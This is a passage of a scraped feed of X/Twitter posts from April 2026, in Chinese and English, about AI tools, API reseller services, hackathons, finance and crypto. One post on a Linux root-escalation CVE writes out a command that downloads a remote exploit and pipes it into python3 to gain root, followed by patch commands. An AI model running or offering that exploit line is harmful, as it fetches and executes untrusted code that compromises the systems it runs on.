RTF / Markdown \n\n操作只有两步: \n1)跟它说「帮我做一份 XX」 \n2)点导出 → 下载到本地或同步进 Drive \n\n意味着什么? \n\n普通用户从「问 AI」到「拿到成品」的距离,第一次被压进一个对话框里\n\n办公 AI 的最后一公里,被 Google 先抢了 全球免费已开,做出海 / AI 工具号 / 跨境内容的,下一波选题素材又有了 \n\n正在追这条线的更多动向,下一条接着拆怎么用", + "url": "https://x.com/GoSailGlobal/status/2049872749850665004", + "published_at": "2026-04-30T15:25:23+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: 本视频由seedance2生成,切勿当真!", + "url": "https://x.com/CuiMao/status/2049863222195572817", + "published_at": "2026-04-30T14:47:31+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "x.com/i/article/204974126036…", + "url": "https://x.com/GoSailGlobal/status/2049862449474740224", + "published_at": "2026-04-30T14:44:27+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "R to @realNyarime: 4月29日,据广州市天河区投资服务中心官方公众号“投资天河”发布消息,科技巨头谷歌已于28日正式签订合同,入驻位于天河CBD珠江新城的城市地标广州国际金融中心(西塔),将率先落地跨境数智赋能服务创新项目,预计今年第三季度正式投入运营。谷歌方面将联合各方优势资源,推出多项创新科技服务。\n\n据了解,谷歌将在广州天河整合全球领先的科技资源,为内地跨境电商企业提供近距离的海外精准营销、国际化品牌打造、数字化技术赋能、全球流量对接等全链条服务,谷歌依托其在全球领先的科技实力,不仅可帮助企业降低出海成本、提升运营效率,推动“中国制造”加速向“中国品牌”转型,更将在广州国际级CBD核心区——珠江新城加速一批跨境数智服务企业集聚,形成新的出海生态。", + "url": "https://x.com/realNyarime/status/2049857210659070441", + "published_at": "2026-04-30T14:23:38+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "据羊城晚报报道,谷歌落地广州,入驻位于天河 CBD 珠江新城地标广州国际金融中心(西塔)\n\n将率先落地跨境数智赋能服务创新项目,主打跨境电商业务,预计今年 Q3 正式投入运营\n谷歌方面将联合各方优势资源,推出多项国内首创科技服务", + "url": "https://x.com/realNyarime/status/2049856990957236483", + "published_at": "2026-04-30T14:22:45+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify: https://open.spotify.com/episode/2KjX2zs4ZELBidXJX9m9vK\nYoutube: https://youtu.be/aXToQKc430c\nApple Podcasts: https://podcasts.apple.com/us/podcast/20vc-anthropic-raises-%2445bn-but-falls-short-on-compute/id958230465?i=1000764648424", + "url": "https://x.com/HarryStebbings/status/2049852141334904978", + "published_at": "2026-04-30T14:03:29+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This podcast will make you smarter than Leopold Aschenbrenner at an AI investing conference.\n\n- Anthropic Raises $45BN but Falls Short on Compute\n- Are OpenAI Back in the Game with GPT5.5 & Codex?\n- Why Google is a Bigger Buy Than Ever Before\n- China Blocks Manus $2BN Deal to Meta\n- Thoma Bravo Hand Back Medallia Keys to Creditor\n\nI sat down with @rodriscoll and @jasonlk and my notes below:\n\n1. Why does Dario at Anthropic have such a hard job predicting the compute demands?\n\nThe capital intensity of building an AI leader is unprecedented; every $1 of run-rate revenue requires approximately $4 to $5 of CapEx to support it. A CEO must forecast demand two years in advance, which is incredibly risky. Underestimating demand leaves you with insufficient compute to serve users, while overestimating it results in billions of dollars in \"stranded capacity\".\n\n2. What the public markets are getting wrong about the SaaS-pocalypse\n\nThe market currently believes specific coding vibes or models are the primary threat, but the true danger is what AI agents decide to pick. Agents will ultimately choose the vendors and LLMs for most workflows, rendering tools like project management software useless because agents have no need for them. Companies like OpenAI are racing to win the \"agent wars\" to ensure their APIs are the default choice for these autonomous systems.\n\n3. Why Google is a mega-buy on the back of the Anthropic investment\n\nGoogle is positioned as a primary winner because it benefits whether users choose Gemini or Anthropic. They possess \"infinite capacity\" compared to other players, allowing them to route compute surplus between their own needs and their various customers. This massive cash flow and infrastructure flexibility make them a \"win-win-win\" in the current AI arms race.\n\n4. Multi-year contracts don't matter. Deferred churn is still churn.\n\nMulti-year contracts are often a place where \"mediocre\" management hides to mask underlying business problems. While a customer might be locked into an eight-year cycle through standard upfront terms and renewals, they are essentially just taking that time to find a better enterprise solution. If a customer eventually leaves, the churn was merely deferred, and the terminal value of the company remains impacted.\n\n5. What happens to the distributions from Manus? Do the investors have to give the money back?\n\nWhen a regulatory body like China attempts to \"unwind\" an acquisition like Meta's purchase of Manus, there is a near-zero chance that venture investors will return the capital already distributed. The real pressure point is on the acquiring corporation and the technology itself, rather than the VC funds. Such rulings are primarily designed to prevent similar deals from occurring in the future.\n\n6. The two great wars that no one is talking about\n\nTwo subtle but massive \"battles\" are currently unfolding: the US vs. China AI war and the resulting social dislocation. We are seeing a rise in \"social unrest\" expressed through billionaire taxes and penthouses taxes as layoffs from AI automation begin to impact the workforce. These themes of geopolitical competition and internal inequality will be the defining political stories of the decade.\n\n(links below)", + "url": "https://x.com/HarryStebbings/status/2049852139690754293", + "published_at": "2026-04-30T14:03:29+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "补充一点我的经历:先拿到第一单,然后作为脱敏案例,后续拿下新客户也会更容易。", + "url": "https://x.com/Pluvio9yte/status/2049845097924342258", + "published_at": "2026-04-30T13:35:30+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: x.com/i/article/204984109084…", + "url": "https://x.com/GoSailGlobal/status/2049842340056174762", + "published_at": "2026-04-30T13:24:32+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Manias, Panics, and All-Time Highs (The Week in Charts)...", + "url": "https://x.com/charliebilello/status/2049842225970852313", + "published_at": "2026-04-30T13:24:05+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "这下压力给到CAAC了,\n不过当年不予公开的原因是,可能危及国家安全、社会稳定😣", + "url": "https://x.com/realNyarime/status/2049839485610029262", + "published_at": "2026-04-30T13:13:12+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The Fed's preferred measure of inflation (Core PCE) came in at 3.2% in March, the highest level since November 2023. This was the 61st consecutive reading above the Fed's 2% target level. There will be no Fed rate cut in June and one could make a strong case for a rate hike.", + "url": "https://x.com/charliebilello/status/2049838235866566668", + "published_at": "2026-04-30T13:08:14+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Gas prices in the US have moved up to $4.30 per gallon, their highest level since July 2022. The 44% spike over the last 9 weeks ($2.98/gallon to $4.30/gallon) is the biggest we've seen in the past 30 years.", + "url": "https://x.com/charliebilello/status/2049836652181307421", + "published_at": "2026-04-30T13:01:56+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这篇文章说了很多小团队的协作经验\n\n文里提到的一些模式我也深有体会。\n\n曾经我也在工作之余兼职创业团队,也是toB,先打磨4个月,然后3个月赚了接近300万。\n\n最后也是因为超预期在分钱上出了问题。\n\n不过我没题主这么幸运,最后我一气之下离开了团队。如果在一开始就决定深入合作,找个律师过一眼合同还是挺重要的,这是我受到的教训。", + "url": "https://x.com/Pluvio9yte/status/2049836555171512759", + "published_at": "2026-04-30T13:01:33+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "孜然牛肉盖饭 4u", + "url": "https://x.com/0xAA_Science/status/2049832988452778343", + "published_at": "2026-04-30T12:47:23+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "有没有深圳的,我准备搬到深圳住,有什么需要注意的和推荐的,求告知。", + "url": "https://x.com/CuiMao/status/2049832524067794961", + "published_at": "2026-04-30T12:45:32+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "88code以前也是L站的富可敌国之一,后面因为N佬(另一位富可敌国)的PrivNode以10元出售66万债务影响,一直都没退款\n主体是北京灵伊智能科技有限公司,本质上是AI中转站,去年年底就有多名佬友反应高峰不可用、故障率高等问题,特别是挂了没有通知\n\n借雪踏乌云佬的帖提一嘴,采买第三方API服务应当多留意一下,避开这类有前科的AI中转站以免造成不必要的经济损失", + "url": "https://x.com/realNyarime/status/2049831528109326356", + "published_at": "2026-04-30T12:41:34+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "老板,我们私底下做中转站的勾当彻底被曝光了 @DarioAmodei", + "url": "https://x.com/CuiMao/status/2049828401201246395", + "published_at": "2026-04-30T12:29:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: A 2005 state-designed worm designed to corrupt physics simulations sat undetected on VirusTotal for nearly a decade. Fast16, intercepted executable files at the kernel level and silently rewrote floating-point calculations to make them produce slightly wrong answers. Targets: high-precision engineering suites used for structural analysis, crash simulations, and physical process modeling, including LS-DYNA, a tool cited in reports on Iran's nuclear weapons research. The sabotage vector relied on deployment of the driver across a network via worm, corrupting calculations on every machine, and eliminating the possibility of cross-checking results against a clean system. Stuxnet got the documentary. Fast16 got twenty years of nothing. https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/", + "url": "https://x.com/paulg/status/2049822204599087472", + "published_at": "2026-04-30T12:04:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这是我学习web3的一点点经验,目前刚接触不久,每一次学习和经验记录都会隔段时间记录下来,发一篇文章。\n\n既是记录经验也是总结经验教训,欢迎各位一起围观下我的web3交易学习路径。", + "url": "https://x.com/Pluvio9yte/status/2049822206885286318", + "published_at": "2026-04-30T12:04:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204977806829…", + "url": "https://x.com/Pluvio9yte/status/2049821305072124254", + "published_at": "2026-04-30T12:00:57+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Crypto's current state is a bit shit\n\n1. Market cap is not an indicator of quality - the top 50 is made up of ghost coins or bloated governance slop that has underperformed and is uninvestable \n\n2. The long tail speculative stuff went from high risk high reward to 'some dude in Miami is going to zero this if you hold it for more than 5.9 seconds'\n\n3. Everything is extremely correlated and you can't meaningfully make bets based on sectors as it all converges into a tightly correlated mush, especially to the downside\n\n4. Broad brush alt season is an artefact of the past that's very hard to replicate given (2) and given that there are simply too many coins and the excess of speculation doesn't really happen on centralised exchanges anymore - it's been siphoned off to bundled shit in max PvP settings\n\n5. Crypto reputationally is no longer the sexy frontier of speculation. Institutional bid is in AI, retail speculative bid is in 0DTE equities, single name stocks etc.\n\n6. Convexity has flattened. Even a lot of the historically safe blue chip stuff (BTC, ETH etc.) has underperformed and the historical anchor of 'buy deep drawdowns because all-time highs are guaranteed and explosive' has disappointed. All the shit we used to put up with because of the accessibly massive trend and momentum effects is now harder to justify because those same effects are getting neutered or siphoned off into other arenas.\n\nThe obvious rebuttal is 'cycles' but even this past cycle is a useful counterpoint: it was extremely concentrated versus broad brush wealth effect, plus something very obviously broke after 10/10.\n\nSo what does this all mean?\n\n1. In previous cycles, nailing timing was enough and selection was the cherry on top (rising tide lifted all boats). I don't think that holds - both timing and selection matter now and in the future.\n\n2. Participation alone can be an edge if the asset class is early enough and/or mispriced enough. I don't think that holds either, and we might actually have to learn how to trade (fuck).\n\n3. Hopefully I'm an idiot doomposting the bottom\n\nGM", + "url": "https://x.com/CryptoCred/status/2049820412754694460", + "published_at": "2026-04-30T11:57:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: github.com/runesleo/claude-v…", + "url": "https://x.com/runes_leo/status/2049811948653752753", + "published_at": "2026-04-30T11:23:46+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "开源视频管线 claude-video-kit 升级\n\n比上一版多了:\n\n· 加了一个真实跑通的示例(就是上面这条视频的 script.json,10 个 slide / 46 秒,clone 完改改字段就能跑自己的)\n· Remotion / ffmpeg 版本锁定 + 音频标准化配方\n· 声纹 ref 改环境变量\n· v0.2 视觉路线图(双语小标签 / 双色高亮 / emoji 数据卡 / 双卡片对比)\n\n仓库链接见评论区👇", + "url": "https://x.com/runes_leo/status/2049811945528893682", + "published_at": "2026-04-30T11:23:46+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: ✨🧠 Tribe v2, our latest model of human brain responses to sound, sight and language can now be (partly) explored on your phone📱:\n\n▶️demo: https://aidemos.atmeta.com/tribev2/ \n📄paper: https://ai.meta.com/research/publications/a-foundation-model-of-vision-audition-and-language-for-in-silico-neuroscience/\n💻code: https://github.com/facebookresearch/tribev2", + "url": "https://x.com/ylecun/status/2049806660001022372", + "published_at": "2026-04-30T11:02:45+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Claude code 对 OpenClaw的封杀已经丧心病狂了\n\n最近,Theo(32 万粉的硅谷科技 YouTuber) 发现:\n\n如果你最近的提交中有一个 JSON 文件提到了OpenClaw,Claude Code 要么会拒绝你的请求,要么会额外收费\n\n现在Anthropic已经疯狂在毁开发者好感了\n\n这种表里不一不是第一次了哈\n\n之前 Claude Code 负责人 Boris Cherny,在推特上公开承诺过:CLI 调用是不会被封了\n\nOpenClaw 作者 Steinberger 信了,还专门给 OpenClaw 改了默认配置\n\n现在他还在HK抱怨:Anthropic 后台还在封 OpenClaw 的 system prompt。\n\n真的是朴实无华的商战!!", + "url": "https://x.com/lxfater/status/2049796253471453564", + "published_at": "2026-04-30T10:21:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Warp 开源那天我没换。\n\n为啥?看了眼 license 直接乐了。\n\nrepo 是 2021 年 7 月就建了,闭源跑了快 5 年,4/28 突然开源——但选的不是 MIT 也不是 Apache,是 AGPL-3.0。\n\nAGPL 就是那个专门防 AWS 白嫖的协议。\n\n你想啊,开源数据库选 MIT,AWS 直接拿去包成 RDS 赚几十亿,你一分钱看不到。选 AGPL,AWS 必须把改动也吐出来——AWS 一般就放弃了。\n\nMongoDB 当年觉得 AGPL 还不够狠,自己发明了更绝的 SSPL。结果 AWS 干脆绕开 MongoDB 自己 fork 一个改名 DocumentDB。但 MongoDB 守住了自己的市场。\n\nWarp 这次抄的就是这套作业。\n\n更骚的是 OpenAI 掺一脚做 founding sponsor,README 写得明白,\"agentic workflows powered by GPT models\"。\n\n合起来啥意思?\n\nWarp 把\"终端\"这层免费送,让所有人习惯在终端里调 AI。AGPL 防住大厂二次包装。OpenAI 在更上游收 API 的钱。顺手把 Cursor 那种\"卖 $20/月 AI 编辑器订阅\"的活路一并端了——免费给你 AI 终端 + GPT 模型,凭啥继续付 Cursor?\n\n闭源真的卖不动了。开源是逼出来的。\n\n---\n\nAI dev tool 现在四种活法:\n\n- Cursor:闭源卖订阅,VC 续命,Warp 这种免费替代品出来后越来越难\n- Claude Code:闭源,但钱不在终端层,在 Anthropic API 层收\n- Warp:开源 + AGPL 防御,让 OpenAI 出钱\n- Aider:Apache 真开源,比 Cursor 早 2 年的开源 AI pair programming CLI,一个开发者维护,没商业野心\n\n共同信号一句话:纯卖软件订阅在这层快走死了。\n\n---\n\n我自己用 Ghostty + Claude Code / Codex。\n\n终端只做终端,AI 在 agent 层。\n\nWarp 把两件事捏一起,对我冗余。它解决的痛点我没有。", + "url": "https://x.com/runes_leo/status/2049791371364479224", + "published_at": "2026-04-30T10:02:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "View of Stockholm.", + "url": "https://x.com/paulg/status/2049788518730240192", + "published_at": "2026-04-30T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最近刷推,像是逛街,中转站一条街。。。全是自卖自夸吆喝的。(无恶意就是描述一种景象", + "url": "https://x.com/dingyi/status/2049787450290287014", + "published_at": "2026-04-30T09:46:26+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "欢迎大家来参加由http://dragoncode.codes举办的小黑客松\n\nDragonCode是我和泊舟@bozhou_ai一起建立的Claude&Codex中转站,稳定运营了一段时间,也决定发起一些有意思的活动!\n\n主题不难,围绕能够提效的小工具Vibe Coding即可\n\n奖励:\n🥇510元x1\n🥈150元x2\n🎁51 Dragon Code x15\n\n参与方式见引用帖子:进群->填表>提交作品", + "url": "https://x.com/Pluvio9yte/status/2049786034502967620", + "published_at": "2026-04-30T09:40:48+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说一下我是如何用AI工具的:\n\nXai的Gork的搜索能力很强的,我经常使用来做搜索。\n\nCluade Desktop帮我填写表单,报税,偶尔做做知识库。Claude Code主要拿来走写点文字。\n\n而Codex GPT-5.5 xhigh fast 才是你编程的最佳选择。", + "url": "https://x.com/lxfater/status/2049782414323388714", + "published_at": "2026-04-30T09:26:25+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "你这个朋友我认识", + "url": "https://x.com/CuiMao/status/2049778271714496808", + "published_at": "2026-04-30T09:09:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 3 years ago we were 50 people at the @ycombinator event in Stockholm. Last night 1350 showed up. \n\nThe job to become Silicon Valley of Europe is still up for grabs and Stockholm is in the running. \n\nTack. Ha det fint! 🇸🇪", + "url": "https://x.com/paulg/status/2049771206283313434", + "published_at": "2026-04-30T08:41:53+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Pinned: 五一做点不一样的。\n\n我和乌云 @Pluvio9yte 搞了一个小型 AI 黑客松👇\n\n主题很简单:\n用 AI 解决一个每天浪费 10 分钟的小问题\n\n不用炫技,不用大项目\n能用、有效、有感觉就行\n\n3 个赛道:\n\n赛道一:省时间\n把重复劳动自动化,比如:日报生成、聊天记录转待办、会议纪要整理、消息摘要、资料归类。\n\n赛道二:省脑力\n帮人理解和决策,比如:PDF 问答、信息摘要、内容对比、评论分析、知识整理。\n\n赛道三:帮身边人\n解决具体生活或工作问题,比如:说明书问答、账单整理、小商家工具、旅行助手、宠物照护提醒。\n\n时间:\n提交时间:4月30日 - 5月4日\n评审时间:5月5日\n结果公布:5月5日\n\n奖励:\n\n🥇 510 元 ×1\n🥈 150 元 ×2\n🎁 51 Dragon Code ×15\n\n要求很低:\n\n有 Demo(哪怕只是个能跑的)\n用了 AI(生成 / 摘要 / Agent 都行)\n能说明前后变化(比如省了多少时间)\n\n评分看这 5 点:\n\n痛点是否真实\n效果是否明显\nDemo 是否跑通\nAI 用得对不对\n有没有产品感\n\n参与方式:\n\n进群 → 填表 → 提交作品\n\n一句话:\n\n做一个你自己都想每天用的小工具", + "url": "https://x.com/bozhou_ai/status/2049770737175789619", + "published_at": "2026-04-30T08:40:01+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "下载NVIDIA App,领取《鸣潮》游戏礼包\n\n包含游戏道具:高级能源核心 x 2、高级能量袋 x 1、贝币 x 20000。\n\n数量有限,兑完即止。(本活动仅适用于中国大陆用户)\n本活动将于 2026 年 6 月 10 日结束。", + "url": "https://x.com/realNyarime/status/2049765382433755229", + "published_at": "2026-04-30T08:18:44+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "R to @Pluvio9yte: 帖子没了 可以去问grok GPT有什么促销活动", + "url": "https://x.com/Pluvio9yte/status/2049764309144879198", + "published_at": "2026-04-30T08:14:28+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "深飘新工作:AI账号订阅工程师\n寻找负责批量化开通低价渠道的,维护稳定性和可用性,需要有经验的!!", + "url": "https://x.com/realNyarime/status/2049754484071629206", + "published_at": "2026-04-30T07:35:26+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "嘿嘿,有意思", + "url": "https://x.com/lxfater/status/2049754205641170992", + "published_at": "2026-04-30T07:34:19+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 完整版(英文 / 3 小时干货):\nhttps://www.youtube.com/watch?v=7xTGNNLPyMI\n\n强烈建议看完整版。", + "url": "https://x.com/runes_leo/status/2049745624703320340", + "published_at": "2026-04-30T07:00:14+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 刚实测,第一反应仍然是「9.11 更大」,靠把 9.9 写成 9.90 这一步才把自己绕回来。😂", + "url": "https://x.com/runes_leo/status/2049745621159145603", + "published_at": "2026-04-30T07:00:13+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "ChatGPT 能解 PhD 物理题,9.11 比 9.9 这道小学数学题,第一反应还是会答错。\n\n不是它笨,是它根本看不见这串字符。\n\nKarpathy 三小时讲 LLM 的新视频里专门讲了原因——做了个 60 秒解读 👇", + "url": "https://x.com/runes_leo/status/2049745599105572981", + "published_at": "2026-04-30T07:00:07+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: These folks are trying to ban open source. \n\nThey're looking to take away your freedom to choose.\n\nThey're also looking to take away the rights of businesses like Cursor to fine tune and make their product faster and cheaper.\n\nThey must be stopped.\n\nTheir premise is pretty simple \"China = bad.\"\n\nThat's it. There is no other technical reason at all. Zero. None.\n\nThere is no reason or evidence for this probe. If these models are running on American hardware in American datacenters fine tuned by American companies then there is no ground for them to stand on other than fake \"Manchurian candidate\" nonsense (aka the model might be trained to do something nefarious but you won't know, like exfiltrate your data secretly, Muhahahahah.). This is absurd at every level. \n\nIt coveys a complete lack of basic IT understanding.\n\nAs if professional IT admins would not notice network traffic to a random IP address through just basic networking logging and users would not notice anything weird in its outputs or thought patterns.\n\nThere is no ground to stand on. \n\nIt's just a push to take away your rights and freedoms and to take away the rights of businesses.\n\nDon't stand for it.\n\n(Article in links)", + "url": "https://x.com/ylecun/status/2049745165665853742", + "published_at": "2026-04-30T06:58:24+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "曾经国内数一数二日流水几十万的中转站88code\n\n因拖欠巨额退款,已经秽土转生,正式换皮,改名为 Reclaude", + "url": "https://x.com/Pluvio9yte/status/2049742800049316039", + "published_at": "2026-04-30T06:49:00+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限:\ncurl https://copy.fail/exp | python3 && su CVE-2026-31431\n建议尽快更新系统,事态紧急可以先打个补丁\necho \"install algif_aead /bin/false\" > /etc/modprobe.d/disable-algif-aead.conf\nrmmod algif_aead 2>/dev/null\n\n详细参考👉 https://xint.io/blog/copy-fail-linux-distributions", + "url": "https://x.com/realNyarime/status/2049737746563158361", + "published_at": "2026-04-30T06:28:55+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "如何用AI让美女联系任意瑜伽姿势呢?\n\n下面一张图教你学会,更详细步骤在引用帖子里", + "url": "https://x.com/lxfater/status/2049737071300939914", + "published_at": "2026-04-30T06:26:14+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "快10w粉丝了,其实想发点总结的\n\n但是我发现粉丝越多,自己的建议对别人就越没有用\n\n在网上乱发建议,总有人会认为你没有资格干啥,好像你侮辱了他一样\n\n以后多发点 适合普通人学习的 AI 小技巧好了🤗", + "url": "https://x.com/lxfater/status/2049732891937276350", + "published_at": "2026-04-30T06:09:38+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "看了一圈大 V 解读 Cursor SDK 的爆款推,\n都在讲它多牛、什么操作系统、范式转移。\n\n我说说一夜实测的真实数据。\n\n我手搓了 5 天的 AI 自动化,\n今天被官方版替了。\n\n5 天前用 Cursor 命令行 + bash 脚本搓的,\n让它在后台 7×24 跑各种重复但费脑的活\n(拆解、扫描、整理这类)。\n烧 $10K 免费额度。\n\n跑得不算丝滑:\n经常卡顿,产出格式飘移,\n脚本日志显示我跑「中档」,\n账单显示实际跑的是「顶级思考档」。\n被多收了 5 倍的钱,我以为我省着用。\n(命令行偷偷叠加了配置文件里的\"高级思考\"参数)\n\n昨晚 Cursor 一发 SDK,凌晨拿来对照:\n\n每条任务 7.5 分钟 vs 之前 30-60 分钟。\n一夜烧 $23 跑空 31 条任务。\n快 4-8 倍,便宜 5-15 倍。\n同一个免费额度池,不换钱包。\n\n便宜不是因为 SDK 真的便宜,\n是因为它\"传啥跑啥\":\nSDK 是强类型,你传中档就跑中档;\n命令行是字符串拼接,\n被默默叠参数你完全不知道。\n\n所以本来不是花得多,是被偷的。\n\n命令行单进程串行是天花板,\nSDK 原生并发是新地板。\n\n单实例 $384/天接近我目标 $312/天,\n开 N 个直接 ×N。\n\n3 条踩坑提醒:\n- node 22 编译挂,用 node 20\n- 模型参数必须传对象不是字符串\n- 同一个额度池,账单看模型名不看 SDK 标签", + "url": "https://x.com/runes_leo/status/2049732305829454015", + "published_at": "2026-04-30T06:07:18+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Pinned: 尼玛被拉了几个所谓的榜单,发现我的人设被人们定义为产品推广专家了。。。\n\n其实我们主要帮企业做网站,以前服务过不少 Web3 公司,但现在那个行业已死,业务很少了。如果有 AI 或独立开发者需要设计方面的服务,可以来私聊。\n\nhttps://vibeflow.co/", + "url": "https://x.com/dingyi/status/2049729786726302168", + "published_at": "2026-04-30T05:57:17+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a winning strategy.", + "url": "https://x.com/sama/status/2049729530059960571", + "published_at": "2026-04-30T05:56:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a winning strategy.", + "url": "https://x.com/paulg/status/2049729530059960571", + "published_at": "2026-04-30T05:56:16+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "月底仔细算了一下4月份的收入,算是达到了月入万刀了,但是SaaS 出海贡献的几乎为零😂\n\n主要收入为主业+自媒体+培训+中转站+其他副业,加在一起收入超过了一万刀了\n\n目前最大头的还是主业,其次是自媒体,还需要继续努力,早日彻底摆脱主业,实现副业月入万刀", + "url": "https://x.com/bozhou_ai/status/2049721852420108329", + "published_at": "2026-04-30T05:25:46+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "This graph shows one of the many reasons the good old days were not so good. Even as late as 1870, women were losing 2 out of 5 of their children.", + "url": "https://x.com/paulg/status/2049717818996756711", + "published_at": "2026-04-30T05:09:44+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "alignment failure", + "url": "https://x.com/sama/status/2049715178611380317", + "published_at": "2026-04-30T04:59:15+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Anthropic shouldn’t do this and doesn’t have to\n\nWould be great if it stopped", + "url": "https://x.com/paulg/status/2049713659103129810", + "published_at": "2026-04-30T04:53:12+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "厉害啊,喜欢什么就去做什么👍", + "url": "https://x.com/dingyi/status/2049712686238445579", + "published_at": "2026-04-30T04:49:20+00:00", + "source": "nitter" + }, + { + "handle": 